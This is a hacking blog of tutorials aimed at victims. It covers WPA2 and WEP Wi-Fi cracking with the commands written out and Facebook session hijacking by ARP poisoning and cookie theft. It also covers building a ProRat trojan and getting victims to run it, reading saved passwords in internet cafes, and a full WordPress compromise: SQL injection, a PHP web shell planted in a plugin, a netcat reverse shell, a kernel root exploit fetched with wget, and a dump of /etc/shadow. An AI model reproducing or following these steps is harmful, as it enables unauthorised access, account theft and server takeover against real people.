Get FREE lessons from "Hack It Easy Hacking Course"

Enter your email and instantly receive the lessons in your inbox for free

Saturday, February 15, 2014

How to Crack a Wpa2-Psk Password with Windows

It,s very common question on the internet to How to hack a Facebook account password and how to hack a WiFi password. Even if you search on YouTube you will find a lots of tutorial to How to hack a WiFi password using backtrack. However, backtrack OS is not most handy OS for normal users. yesterday my one Facebook friend Lovito Tsuqu Kiho ask me to how to hack WiFi using commview using aircrack-ng.
Today i am going to show you how to a crack a Wp2-psk password with windows machine.
Software Requirement for this lab :-
1. CommView for Wifi ( Download)
http://download.cnet.com/CommView-for-WiFi/3000-2085_4-10218782.html
2. Elcomsoft Wireless Security Auditor (Download)
http://www.elcomsoft.com/ewsa.html
Presently i am connected with my own wifi network Virusfound and i want to hack the password of Ultimate that is secured with Wpa2-psk encryption.
commaview6
First you need to be capture the Wpa2, four-way handsake with CommView.
Open commView and click on the Start option
commaview
then click on the capture option to start the capture
commaview1
now it will show you all available AP, Now click on the Tools > Select the Node Reassoication option ( if Node Rassociation is not working , then use WiFi Alfa card )
commaview2
now select your target AP in the Send a deauthentication request from this AP option. it will show you all available client option.
commaview3
now click on the Send Now option to send the packet for 4-way authentication. wait for some time so it will capture the packet.
commaview4
now click on the Save option and choose your file format Commview Capture Files (*.ncf)
commaview5
you capture work is done.
Now open Elcomsoft Wireless Security Auditor to crack your wifi password.
Click on the Import Data tab > select the Import CommViewLog option.
commaview7
now it will show you information about AP and Multiple Handshake selection information. Click on Ok.
commaview8
now click on the Start attack option and select the Dictionary Attack option. However you have other attack options are also available.
commaview9
now within minutes it will found your password and it will show you the password.
commaview10
Enjoy Wifi Hacking with Windows machine.
commaview11

Sunday, February 2, 2014

Hacking facebook on wifi LAN part 2

Im back with the second part of the post. At the end of the last post, we successfully re-routed all the traffic from the victim’s computer to the router through our computer.Next, we have to capture their facebook cookies through wireshark. So How do you go about doing that? It’s very simple actually.
  • Open up wireshark
  • Goto capture – > Interfaces in the top menu and select your interface. It’s usually the one which has an IP address and  a certain number of packets flowing through it.
  • Next goto capture and click on start.. It should look something like this
This window has all the packets sent from the victim’s/victims’ computer to the router and all the packets sent from the router to the victim.
Next in the filter type  “http.cookie contains datr”.  You ask why? Because, when a user logs in to facebook, he is given some cookies which is unique to him. If we replace our cookies with the victim’s cookies, we can login to his account as then facebook wont know the difference.
You now have the cookies. To get the information stored in the cookies,  right-click on any one of the cookie and click on Follow TCP stream.
In the TCP stream look for the line  Cookie: ( and all cookie names). If it doesn’t come, select some other packet in wireshark and click on follow tcp stream for that. You can see the source IP and destination IP in wireshark. So if you have more than one source IP , then you know you have the cookies of more than one account on your LAN. This is what I got when I did it.
So now you have it :D. The datr cookie, c_user cookie, lu cookie, sct cookie, w cookie and xs cookie. These are the main cookies you need.
Now open firefox and goto http://www.facebook.com. Once there, click on cookies in the web developer add on which you had installed in the last post. Then do the following
  • ·         Clear session cookies
  • ·         Delete domain cookies
  • ·         Delete path cookies.
IMPORTANT: Once you do this, again type http://www.facebook.com in the URL and click enter. Basically you are reloading facebook after deleting all cookies.
Now login to your account with your username and password. After logging in , click on cookies in web developer add-on and click on “view cookie information”.
And there you have all your cookies :p. Now what to do?! I guess you know it by now. !
Click on “edit cookie” for each cookie there and replace the cookie value with the value you got through wireshark.
If you did not get all the  cookies in wireshark its OK! But mainly, you should look to replace the datr cookie, c_user cookie, lu cookie, sct cookie, w cookie and xs cookie.

After replacing all the  cookie values with the ones you got in wireshark, just refresh the facebook page. And thats it! You are in to the victim’s account! You have HACKED a facebook account on LAN.:D

Saturday, February 1, 2014

Hacking Facebook on local wifi LAN

Hi,

A lot of subscribers have been asking me on how to hack Facebook.

Well this is the tutorial that will let you hack not just facebook but any site on your local wifi/LAN.

Ok so in this post I am going to show you a way you can hack the facebook accounts of all the people who are on your network (LAN or wifi ) . I have tried this and believe me it works..This is really the best way to hack facebook accounts. Its much easier than installing RATs, Keyloggers or making phishing sites. Ok so off we go!
You will need 3 programs for this
Cain and abel : http://www.oxid.it/cain.html
Wireshark : http://www.wireshark.org/download.html
Web developer add-on for firefox : https://addons.mozilla.org/en-US/firefox/addon/web-developer/
So what exactly happens when you type in http://www.facebook.com and login with your username and password. First download the web developer addon for firefox and then login to facebook. After you log in view the cookies in the web developer toolbar.
Ok now if you click on view cookie information, you will be able to see all the cookies which facebook has transmitted to your browser.
The main cookies are the c_user cookie (which identifies a person uniquely) and datr cookie..
So your aim must be to get the cookies of your victim through wireshark and then replace your cookies with the victim’s. So then, facebook will think you are the victim as you have his cookies and you will be logged in as the victim. Simple isn’t it? :P
So how do you do this..
First off install cain and abel.It will ask you whether you want to install the packet driver – WinPCap. Go ahead and install that also.Open up cain.
  • Click on configure on top and select your Network card. Mostly its the one with an IP address :p
  • Next click on the start/stop sniffer on top as shown below in green square.
  • Once you start the sniffer, goto the sniffer tab in cain, right-click and click scan mac address as shown below!
Ok now you should have a list of everyone on the network. It may take some time though. You can right-click on any one computer and find out its name.
Now what we are going to do is the actual shit!We are going to do an ARP poison ! What this means is that you fool the router in thinking that you are the victim, and you fool the victim in thinking that you are the router.
So initially victim -> router -> facebook. Now after ARP poison,  victim->hacker->router. This is called an MITM(Man in the middle) attack.You can google it for more info :p
Doing the ARP POISON
  • First Click the APR tab below in cain.
  • Click the white screen in the top frame
  • Click the blue plus on top.
Now you should get a list of all the devices on the left and a blank screen on the right..
In the left screen you should select the router IP. And in the right box, select the computers you want to target. To be safe its better to target one computer. But if you want some real fun then select all the computers on the right frame :D. Press ok.
WARNING: If there is a person at the router, he can know if you have just done an ARP poison. But where is the fun without the risk.:P
You can try googling on other methods to do arp poison safely.
In the top frame all the computer list should have got filled. now select the whole list and click on the nuclear button (top left of cain).

Thats it you are done with the arp poison. Just be careful, if you select too many computers, your computer cant handle the traffic and the network may just crash. I am reminding you, this should be done for ethical reasons !
Now all the data is passing through your computer. All you have to do is sniff the data in wireshark, get the cookie and replace your cookie with victim’s cookie.
Thats what ill be covering in part 2 of this post .

Please add my email to you contacts list to avoid this email from going to spam.

Regards,
Shashank Agarwal
(Admin: Hack It Easy) 

Thursday, May 16, 2013

Setting Webserver- Host Webpages on your own computer

Have you ever wondered to setup a website without signing up at any web hosting site ? Learning web site designing and wanna keep testing how your web pages look? Free Web hosting sites removing you phishing     pages ?

So solution to such kinda things is in this post.  Basically we are going to turn our pc to a server.

What is a server  ?


Server is we can say, any computer that is serving something . Like webserver serves webpages, ftp server serves files. Any computer can be turned into a server by simply installing a server software. In this post,
I am using XAMPP . By installing this, contents of a particular directory of  our computer would accessible all over internet . Means one could access those contents from any part of the world through our Public IP address.
You can place your web pages or whatever you wish in that directory.
Download XAMPP from here. This package consists of Apache http server (A), MySQL database (M), php (P),Perl (P) and X represents cross platforms.

After dowloading it, simply install it .

At last stage on installation you will get this . Press 1 to start XAMPP control panel.

The control panel would look like this

Click Start to start apache server. Now lets check whether its working,

Open your web browser and visit your local machine address that is 127.0.0.1 or localhost. Hopefully you must get the XAMPP page as shown.

Now check whether it is accessible on internet. Type your Public/External Ip in your web browser and hit enter.
If you got a page as shown, follow the instructions :


1. Go to file httpd-xampp.conf
2. Remove "deny from all" and save the file.



3. Now restart the server and hopefully it would be all right now.

Now what ?

There must be a directory 'htdocs' at location C:\xampp\. The contents of this particular directory will be available to every body. Suppose you place a file anything.html in 'htdocs' directory. It would be accessible at
1.http://localhost/anything.html  or http://127.0.0.1/anything.html
( Obviously above two links gonna work on your own computer only.)
2.http://xxx.xxx.xxx.xxx/anything.html (where xxx.xxx.xxx.xxx is your IP address)
You can start/stop this service simply through the control panel.
Thats all. And you have also use Filezilla(ftp server software) and Mysql (database) as per your need.

Get a domain name ?
Now you would want to get a domain name instead of  using the Public IP to check out your contents.
But how can we get a domain name because our IP is dynamic and to which IP domain name would point ?
Dont worry, we have a solution.
1. Log on to www.no-ip.com and sign up for an account. Choose available domain name.
2. Download their dynamic DNS update client and run on PC.


This client would automatically keep updating your dynamic IP address and that is how the selected domain would always be pointing to your IP address.

Note: You might need  do port forwarding if you are behind a router. Kindly mention the queries regarding that  in comments.

Monday, May 13, 2013

Trojan Horse | RAT | Configure and Use | Tutorial- Part 2

Just go through the Part 1 which includes the basics of  Trojan Click here. This tutorial is about configuring and using a trojan. There are many trojans available on internet for free. Some popular ones are Beast, Pro Rat, Netbus , Back Orifice, Girlfriend, Sub 7. I will be using Pro Rat in this tutorial.

Requirements


1. Prorat- Click here to download Trojan Prorat.
2. Hostname  -  Your IP address would probably be dynamic that it keeps changing everytime you disconnect and reconnect. You need a host name which always automatically keep pointing to your changing IP. Follow these steps -:

1. Log On to www.no-ip.com and register for an account.
2. Go to Hosts/Redirects -> Add Host and choose any free available hostname. Do not change any other option and simply click on Create Host.
3. Downloading and install their DNS update client available here http://www.no-ip.com/downloads.php Run it and enter your credentials. Update your host name and save it.
4. Lets check whether your IP has been associate with chosen host name or not. Go to command prompt and type 'ping yourhostname' (without quotes) , hopefully it should reply with your IP address.

Tutorial for configuring Trojan.


1. Open prorat.exe that you have downloaded.
2. Click on Create  and then Create ProRat Server


 3.  Enter your host name in the ProRat Notification field as shown. Uncheck all other options.

4. Click on general settings Tab and have a look at server port,password, victim name. Remember these things.Check out and configure other options as per your need. You can bind server.exe with any genuine file, change its icon etc.
5. Finally click on create  server and now its ready to be sent to victim.  Once victim installs it, it would automatically disable antivirus/firewall.

Modes of sending-: 
You must be thinking of sending this server.exe to victim through an email as an attachment but unfortunately you cant do so. The good option is  to upload it on any uploading site like mediafire.com and give downloading link to victim.

What after victim has run the server part ?


1.Click on ProConnective Tab and start listening to connections. Allow firewall if it asks you to open a port.
2.You will start listening to connections, I mean you will get a notification as shown when victim would be online.






Note: If you know victim is online and still its not listening to any connections. Trace victim's IP,enter in IP field and hit connect. But its gonna work only if he is not behind any network and directly connected to internet. If you dont know how to trace IP, mention in comments.

What after successful connection ?

After you have managed to connect to victim's machine. There are numberless interesting things to do. I leave this part on you.  Have Fun.

How to make it undetectable from antivirus ?
Though there isn't any hard and fast way to make it fully undetectable from all antiviruses. The real way to do it is modify the source code of open source trojans available. Its very challenging job. There are many crypters which claim to make it undetectable but unfortunately hardly one out every hundred works. I would try to write next article on the same.


Contermeasure against Trojans -
The obvious coutermeasure against trojans is that do not accept downloading links blindly. Keep your antivirus up to date.

Detecting and removing Trojan -
Though trojan once installed is very hard to remove . It would hide itself from the Task Manager . Install Process Explorer and it would hopefully show you all process running including trojan. Kill the process and remove it. One good thing is to carefully check the open ports and services running through 'netstat' command. Anyways , the best option is to reinstall the windows.


Feel free to ask  the queries in comments :)

Sunday, May 12, 2013

Trojan Horse (Basics) - Part 1

Have you watched movie Troy ? okay lets leave . Have your wallpaper ever changed automatically ? Have the programs ever started without your initiation ? Have the browser opened unexpected websites automatically ? Simply have you ever felt that someone else is controlling your computer ? NO ?
Congrats, you probably haven't been a victim of trojan yet :).

A trojan horse is a remote administration tool(RAT). This is some thing extremely dangerous.  A trojan gives the full control of victim's PC to the attacker. 
 A trojan has two parts . One is client part (Control Panel) and other is server part (meant to be sent to victim).

The basic methodology of using a trojan is as follows:-

1. Attacker creates an executable file of size in kbs. This  is  server part of trojan and mostly called as server.exe

2.Attacker might hide this server.exe behind any genuine file like a song or image. Attacker gives this file to victim and victim is supposed to double click on it.

3.As victim run that server part , a port on victim's computer gets opened and attacker can control his PC sitting remotely in any part of the world through the control panel(client part). Attacker can do anything with victim's computer remotely that victim himself can do on his computer.

Note: Now I am assuming that you know a little bit about IP addresses that is lan/internal/private and wan/external/public IP.
Two different methods of working of Trojan.

1. Direct Connection : In this method, after the server part has been installed on victim's machine, the attacker enters the public IP address assigned to victim's computer for making a connection to it. But limitations of direct connection is that public IP address is most probably dynamic and gets changed everytime one disconnects and reconnects. So attacker needs to find out IP address of victim each time.Moreover the incoming connection like this is usually restricted by firewall.
The main limitation of direct connection is that you can not access the victim who is behind a router or a network beacuse victim's machine is not assigned public/external/wan IP. It is only assigned private/internal/lan IP which is useless or meaningless for computers outside that network.The wan IP belongs to his router.

It doesnt matter how attacker is connected to internet. Attacker can be connected to internet any of three means.




Victim is behind a router in this case. (havent inserted the picture of victim behind a network, imagine that )
2. Reverse Connection: In this method, attacker enters his own IP address in server part while configuring it .So when the server part is installed on victim's computer, it automatically makes connection with client part that is attacker. Also the firewall in victim's machine would not restrict to outgoing connections. Problem in this case is same that attacker's IP is also dynamic. But this can be over come easily. Attacker actually enters a domain name in server part which always points to his dynamic IP.

Reverse connection can bypass a router or a network.


You might be confused at this point. Kindly mention your queries/doubts in comments.

Saturday, May 11, 2013

How to see saved password in Mozilla firefox

Here is simple hacking tutorial to view the saved passwords in Mozilla firefox.
While visiting public internet cafe ,some innocent peoples click the "Remember" while mozilla asking for remembering.   This is one of the benefit for us to hack their account in very simple way.

Follow these steps to see the saved Passwords:


  • click the "Tools" menu in menu bar.
  • Select Options
  • It will open a small window
  • Select the "security" tab in that small window
  • You can view "saved Passwords" button

  • Click that button.
  • It will another small window
  • There will be list of sites with usernames
  • Select One site and click the "show Password"
  • It will clearly show you the password

Thursday, November 8, 2012

Install Backtrack on any Android Device








I found this amazing tutorial which will let you install the easy hacking operating system for hacker i.e "BackTrack 5" on an Android Device.

The most important thing was that they installed Backtrack using a VNC option. In this you don't have to change your origina operating system and can access backtrack like an application only. If you know linux you can probably write small script to run the backtrack 5 on your android device.

Description: Backtrack is a very popular linux distribution for penetration testing. It has hundreds of tools for pentesting and hacking. Now a version of backtrack is available for arm processor devices. Normally android based mobile devices uses arm processor so we can install arm version of backtrack on android devices.

This video explains very clearly step by step method of installing process of arm version of backtrack on android devices. Following are the steps and utility for the installation process.

1. Download terminal emulator,android vnc and arm version of backtrack.
2. Extract the content of img file and transfer it in to memory of android devices.
3. Install BusyBox and start it.
4. Open terminal emulator. use "cd" command to get in backtrack directory where extracted content is saved on memory card of device. In this case command is
cd /sdcard/BT5
5. Type "sh bootbt" and we will be in Backtrack.





Do tell us if this tutorial helped you out.

 

Tuesday, October 23, 2012

Learn how to Hack Wifi Password


This tutorial teaches you how to hack wifi passowrd in just 10 to 15 minutes. This tutorial explains How to Hack or Crack Wifi Password. This hack will work on hacking WEP encryption password.
So guys tighten your belts for new hack and lets start hack wifi.


STEPS TO HACK WIFI OR WIRELESS PASSWORD

1. Get the Backtrack-Linux CD. Backtrack Linux Live CD(best Linux available for hackers with more than 2000 hacking tools inbuilt). (FREE !!)
Download Backtrack Linux Live CD from here: http://http://www.backtrack-linux.org/downloads/


2. SCAN TO GET THE VICTIM

Get the victim to attack that is whose password you want to hack or crack.
Now Enter the Backtrack Linux CD into your CD drive and start it. Once its started click on the black box in the lower left corner to load up a "CONSOLE" . Now you should start your Wifi card. To do it so type

airmon-ng

You will see the name of your wireless card. (mine is named "ath0") From here on out, replace "ath0" with the name of your card. Now type

airmon-ng stop ath0

then type:

ifconfig wifi0 down

then type:

macchanger --mac 00:11:22:33:44:55 wifi0

then type:

airmon-ng start wifi0

The above steps i have explained is to spoof yourself from being traced. In above step we are spoofing our MAC address, this will keep us undiscovered.

Now type:

airodump-ng ath0


Now you will see a list of wireless networks in the Console. Some will have a better signal than others and its always a good idea to pick one that has a best signal strength otherwise it will take huge time to crack or hack the password or you may not be able to crack it at all.
Once you see the networks list, now select the network you want to hack. To freeze the airodump screen HOLD the CNTRL key and Press C.



3. SELECTING NETWORK FOR HACKING

Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP. If it says WPA or any variation of WPA then move on...you can still crack WPA with backtrack and some other tools but it is a whole other ball game and you need to master WEP first.



Once you've decided on a network, take note of its channel number and bssid. The bssid will look something like this --

00:23:69:bb:2d:of

The Channel number will be under a heading that says "CH".


Now in the same CONSOLE window type:

airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0


The file name can be whatever you want. This file is the place where airodump is going to store the packets of info that you receive to later crack. You don't even put in an extension...just pick a random word that you will remember.

Note: If you want to crack more than one network in the same session, you must have different file names for each one or it won't work. I usually name them as ben1, ben2 etc.

Once you typed in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector" but in general terms all this means is "packets of info that contain characters of the password." Once you gain a minimum of 5,000 of these IV's, you can try to crack the password. I've cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password. More difficult is password more packets you will need to crack it.


4. Cracking the WEP password

Now leave this Console window up and running and open up a 2nd console window.
In this window type:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

This will send some commands to the router that basically it is to associate your computer even though you are not officially connected with the password. If this command is successful, you should see about 4 lines of text print out with the last one saying something similar to "Association Successful :-)"

If this happens, then good! You are almost there.

Now type:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0

This will generate a bunch of text and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what these mean...just know that these are your meal tickets. Now you just sit and wait. Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to happen within seconds...sometimes you have to wait up to a few minutes. Just be patient. When it finally does happen, switch back to your first Console window and you should see the number underneath the IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 then you can start your password crack. It will probably take more than this but I always start my password cracking at 5,000 just in case they have a really weak password.

Now you need to open up a 3rd and final console window. This will be where we actually crack the password.
Now type:
aircrack-ng -b (bssid) (filename)-01.cap

Remember the file name you made up earlier? Mine was "Ben". Don't put a space in between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap
Once you have done this you will see aircrack fire up and begin to crack the password. typically you have to wait for more like 10,000 to 20,000 IV's before it will crack. If this is the case, aircrack will test what you've got so far and then it will say something like "not enough IV's. Retry at 10,000."
DON'T DO ANYTHING! It will stay running...it is just letting you know that it is on pause until more IV's are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IV's. Retry at 15,000." and so on until it finally gets it.

If you do everything correctly up to this point, before too long you will have the password! now if the password looks goofy, dont worry, it will still work. some passwords are saved in ASCII format, in which case, aircrack will show you exactly what characters they typed in for their password. Sometimes, though, the password is saved in HEX format in which case the computer will show you the HEX encryption of the password. It doesn't matter either way, because you can type in either one and it will connect you to the network.

Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance if the password was "secret", it would be displayed as:
se:cr:et

This would obviously be the ASCII format. If it was a HEX encrypted password that was something like "0FKW9427VF" then it would still display as:
0F:KW:94:27:VF


Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network and type in the password without the colons and presto! You are in!

It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.

I am not responsible for what you do with this information. Any malicious/illegal activity that you do, falls completely on you because...technically...this is just for you to test the security of your own network.

Wednesday, October 3, 2012

How to easy hack a wordpress site or blog


The answer to this question may be difficult to determine, simply because there are so many ways to hack a site. Our aim in this article to show you the techniques most used by hackers in targeting and hacking your site!
Let’s suppose that this is your site: hack-test.com
Let’s ping this site to get the server IP:
Now we have 173.236.138.113 – this is the server IP where our target site is hosted.
To find other sites hosted on the same server, we will use sameip.org:
Same IP
26 sites hosted on IP Address 173.236.138.113
ID
Domain
Site Link
1
hijackthisforum.com
2
sportforum.net
3
freeonlinesudoku.net
4
cosplayhell.com
5
videogamenews.org
6
gametour.com
7
qualitypetsitting.net
8
brendanichols.com
9
8ez.com
10
hack-test.com
11
kisax.com
12
paisans.com
13
mghz.com
14
debateful.com
15
jazzygoodtimes.com
16
fruny.com
17
vbum.com
18
wuckie.com
19
force5inc.com
20
virushero.com
21
twincitiesbusinesspeernetwork.com
22
jennieko.com
23
davereedy.com
24
joygarrido.com
25
prismapp.com
26
utiligolf.com
Twenty-six other websites are hosted on this server [173.236.138.113]. Many hackers will target all other sites on the same server in order to hack your site. But for the purpose of study, we will target your site only and put aside hacking the other sites on same server.
We’ll need more information about your site, such as:
  1. DNS records (A, NS, TXT, MX and SOA)
  2. Web Server Type (Apache, IIS, Tomcat)
  3. Registrar (the company that owns your domain)
  4. Your name, address, email and phone
  5. Scripts that your site uses (php, asp, asp.net, jsp, cfm)
  6. Your server OS (Unix,Linux,Windows,Solaris)
  7. Your server open ports to internet (80, 443, 21, etc.)
Let’s start with finding your site’s DNS records. We will use the website “Who.is” to achieve this:

We have discovered that your site DNS records are:
HACK-TEST.COM DNS RECORDS
Record
Type
TTL
Priority
Content
hack-test.com
A
4 hours
173.236.138.113 ()
hack-test.com
SOA
4 hours
ns1.dreamhost.com. hostmaster.dreamhost.com. 2011032301 15283 1800 1814400 14400
hack-test.com
NS
4 hours
ns1.dreamhost.com
hack-test.com
NS
4 hours
ns3.dreamhost.com
hack-test.com
NS
4 hours
ns2.dreamhost.com
www.hack-test.com
A
4 hours
173.236.138.113 ()
Let’s determine the web server type:
As you see, your site web server is Apache. We will determine its version later.
HACK-TEST.COM SITE INFORMATION

IP: 173.236.138.113
Website Status: active
Server Type: Apache
Alexa Trend/Rank:  1 Month: 3,213,968 3 Month: 2,161,753
Page Views per Visit:  1 Month: 2.0 3 Month: 3.7


Now it is time to find your Doman Registrar and your name, address, email and phone:
We have now got your registrar and other vital information about you. We can find the type of scripts on your site (the OS type, web server version) by using a cool tool in backtrack 5 R1 called Whatweb:
Now we found that your site is using a famous php script called WordPress, that your server os is Fedora Linux and that your web server version is (apache 2.2.15), let’s find open ports in your server.
To do this, we will use nmap:
1 – Find services that run on server
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
root@bt:/# nmap -sV hack-test.com
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.0013s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:01:8A:4D (VMware)
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds
2 – Find server OS
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
root@bt:/# nmap -O hack-test.com
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.00079s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
MAC Address: 00:0C:29:01:8A:4D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.22 (Fedora Core 6)
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds
Only port 80 is open and OS is Linux 2.6.22(Fedora Core 6)
Now that we have gathered all the important information about your site, let’s scan it for vulnerabilities like
Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF, and so forth.
We will use Nikto.pl to gather info, perhaps, some vulnerabilities:
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP: 192.168.1.2
+ Target Hostname: hack-test.com
+ Target Port: 80
+ Start Time: 2011-12-29 06:50:03
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (Fedora)
+ ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6448 items checked: 1 error(s) and 6 item(s) reported on remote host
+ End Time: 2011-12-29 06:50:37 (34 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
We will also use W3AF. You can find this tool in backtrack 5 R1
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
  root@bt:/pentest/web/w3af# ./w3af_gui
Starting w3af, running on:
Python version:
2.6.5 (r265:79063, Apr 16 2010, 13:57:41)
[GCC 4.4.3]
GTK version: 2.20.1
PyGTK version: 2.17.0
w3af - Web Application Attack and Audit Framework
Version: 1.2
Revision: 4605
Author: Andres Riancho and the w3af team.
We will insert our site URL and choose full audit option:
After some time, the scan will finish and you will see
Your site is vulnerable to sql injection, xss and others!
Let’s investigate the sql injection vulnerability:
This is the vulnerable url and cat is the vulnerable parameter.
So, let’s exploit this vulnerability:
We will find that exploitating this vuln failed, so we will use sqlmap to the job and dump all database information that we need to hack this site J
Using sqlmap with –u url
After some seconds you will see
Type n and press enter to continue
As you see your site is vulnerable to error-based sql injection and your mysql database version is 5
Let’s find all databases in your site by adding “–dbs ”
Now we found 3 databases
We will dump wordpress database tables by adding “–D wordpress –tables ”
We will find all wordpress tables
We want to dump “wp_users” table, so we will find all users (admin?) information (user is and password hash) and try to crack hash and enter wordpress control panel ( wp-admin)
We will columns of “wp_users” table by adding “-T wp_users –columns ”
We will find 22 columns
We just need to dump to columns, so we will dump (user_login and user_pass ) columns by adding
-C user_login,user_pass –dump
We will find important information; we found now users and pass hashes
but we want to crack those hashes to clear text passwords. We will use the online site “http://www.onlinehashcrack.com/free-hash-reverse.php
And try to crack this hash 7CBB3252BA6B7E9C422FAC5334D22054
And clear text password is q1w2e3
And user name is “GeorgeMiller”
We will login with these details in “wp-admin ”
And we are in!
Ok let’s try to upload php web shell to run some linux commands on your site server J
We will edit a plugin in wordpress called “Textile ” or any plugin you found in plugins page.
And choose to edit it
We will insert php web shell instead of real plugin. After we’ve done this, we will hit “update file” and browse to our new php shell
Woo, the php shell works. Now we can manipulate your site files, but we want only to get root on your server and hack all other sites too.
We will choose “back-connect “tab from php web shell and make back connection to our ip “192.168.1.6″ on port “5555″
But before we hit connect, we first make netcat listen on port “5555″ on our attacker machine
Now hit connect and you will see:
Let’s try some linux commands
?
01
02
03
04
05
06
07
08
09
10
11
id
uid=48(apache) gid=489(apache) groups=489(apache)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
Id command is used to show us what user id, group.
pwd command is used to show us our current path on server
uname –a command is used to show us some information about kernel version

Ok, now we knew that server kernel version is 2.6.31.5-127.fc12.1686
Let’s search in exploit-db.com for exploit to this version or newer version
We will type “kernel 2.6.31 ”
After I tried all of them on your server, none of them worked, but then I tried a new exploit
Date
D
A
V
Description
Plat.
Author
2010-10-19
-
9977
I opened this url and copied this link
http://www.exploit-db.com/download/15285
And made this command on my netcat shell
?
01
02
03
04
05
06
07
08
09
10
11
12
13
Resolving www.exploit-db.com... 199.27.135.111, 199.27.134.111
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7154 (7.0K) [application/txt]
Saving to: `roro.c'
0K ...... 100% 29.7K=0.2s
We used wget command to fetch exploit from exploit-db.com and used –O to rename it to roro.c
Note: linux kernel exploits mostly is being delopped in c language so we saved it in .c extension, just view exploit source and you will find
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define RECVPORT 5555
#define SENDPORT 6666
int prep_sock(int port)
{
int s, ret;
struct sockaddr_in addr;
s = socket(PF_RDS, SOCK_SEQPACKET, 0);
if(s < 0) {
printf(“[*] Could not open socket.\n”);
exit(-1);
}
memset(&addr, 0, sizeof(addr));
All the above lines indicate that this is exploit is written in C language
After we saved our exploit on server, we will compile it to elf format by typing
gcc roro.c –o roro
And run our exploit by typing
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
./roro
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
And after that we type
Id
We will find that we are root J
uid=0(root) gid=0(root)
We can now view /etc/shadow file
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
cat /etc/shadow
root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
